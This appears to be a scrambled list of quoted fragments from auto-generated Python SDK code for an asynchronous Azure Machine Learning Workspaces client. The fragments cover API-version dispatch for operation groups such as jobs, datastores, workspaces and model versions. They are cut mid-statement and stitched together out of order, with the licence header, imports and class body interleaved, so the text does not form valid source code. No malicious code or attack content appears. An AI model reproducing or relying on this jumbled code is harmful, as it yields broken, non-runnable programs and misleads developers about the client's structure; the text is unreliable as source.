data_version(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\"", "'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG +", "run_artifacts(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version =", "version {} does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "raise ValueError(\"API version {} does not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config,", "EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the API version: *", "'2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API version {} does", "import models return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return", "'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the", ":class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from", "depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01:", "..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause", "version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version =", "import models return models elif api_version == '2021-10-01': from ..v2021_10_01 import models return", "depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if", "ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass", "the project root for # license information. # # Code generated by Microsoft", "* 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces')", "have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance", "= AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version):", "models return models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models return models", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", ":class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from", "'2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API version {} does", ":class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations", "-------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the API", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version ==", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API", "= self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on", "* 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments')", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the API version: *", "..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the API", "1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>`", "2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01':", "'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on the", "operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends", "{} does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_job_endpoint'\".format(api_version))", "# regenerated. # -------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import", "Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>`", "the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\"", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-05-01':", "Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>`", "@property def migration(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\"", "* 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version ==", "EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the API version:", "to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target subscription.", "@property def data_call(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\"", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "@property def jobs(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` *", "'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the", "raise ValueError(\"API version {} does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config,", "Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>`", "2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01':", "else: raise ValueError(\"API version {} does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client,", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'model_versions'\".format(api_version)) return", "the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` *", "operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends", "api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass", "\"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as", "version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version =", "'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace':", "'2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the API", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else:", "raise ValueError(\"API version {} does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config,", "models return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models", "= self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else:", "have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version ==", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the API version: *", "@property def virtual_machine_sizes(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` *", "2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version", "{} does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "@property def model_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` *", "API version available on public Azure. For production, you should stick to a", ":class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version", "on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>`", "else: raise ValueError(\"API version {} does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client,", "2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if", "models elif api_version == 'v1.0': from ..runhistory import models return models elif api_version", "the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\"", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01':", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API version", "WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass", "runs(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version =", "available on public Azure. For production, you should stick to a particular api-version", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the API", "and/or profile. The profile sets a mapping between an operation group and its", "..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations", "not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self):", "== '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "'2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version {} does", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-05-01': from", "= self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif", "\"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on the API", "== '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "operations if no Retry-After header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG =", "version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from", "..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {} does not have", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the API", "have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance", "import MetricOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "api_version: API version to use if no profile is provided, or if missing", "if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential", "Will be removed in final version of multiapi azure-core based client \"\"\" pass", "stick to a particular api-version and/or profile. The profile sets a mapping between", "api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass", "batch_job_endpoint(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version =", "models return models elif api_version == 'v1.0': from ..runhistory import models return models", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` *", "on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>`", "raise ValueError(\"API version {} does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'model_containers'\".format(api_version)) return", "on public Azure. For production, you should stick to a particular api-version and/or", "self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the API version: *", "..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on the", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on the API version: * 1.0.0:", ":class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version =", "AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile )", "* 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane import models return", "\"\"\"Instance depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace')", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0':", "2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview:", "'2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif", "on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>`", "operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close()", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the API version: *", "* v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01':", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'online_deployments'\".format(api_version))", ":class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version", "* 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version ==", "== '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "else: raise ValueError(\"API version {} does not have operation group 'run'\".format(api_version)) return OperationClass(self._client,", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version", "@property def workspace_features(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` *", "== '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: 